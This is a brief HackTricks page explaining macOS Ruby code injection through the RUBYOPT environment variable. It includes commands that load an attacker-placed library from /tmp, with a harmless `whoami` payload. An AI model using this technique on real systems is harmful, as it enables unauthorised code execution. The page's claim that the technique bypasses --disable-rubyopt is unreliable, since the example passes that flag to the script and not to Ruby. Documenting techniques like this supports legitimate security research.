macOS Ruby Applications Injection

Support HackTricks


Using this env variable it's possible to add new params to ruby whenever it gets executed. Although the param -e cannot be used to specify ruby code to execute, it's possible to use the params -I and -r to add a new folder to the libraries to load path and then specify a library to load.

Create the library inject.rb in /tmp:

puts `whoami`

Create anywahere a ruby script like:

puts 'Hello, World!'

Then make an arbitrary ruby script load it with:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Fun fact, it works even with param --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Support HackTricks

Last updated